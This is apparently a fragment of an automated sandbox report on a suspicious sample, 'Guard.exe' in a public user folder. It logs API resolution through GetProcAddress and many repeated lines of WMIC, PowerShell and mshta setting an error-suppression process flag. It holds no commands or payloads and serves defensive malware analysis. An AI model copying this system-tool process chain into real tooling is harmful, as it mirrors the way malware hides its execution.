Source: C:\Users\Public\Guard.exeCode function: 23_2_00B733B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,23_2_00B733B7
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
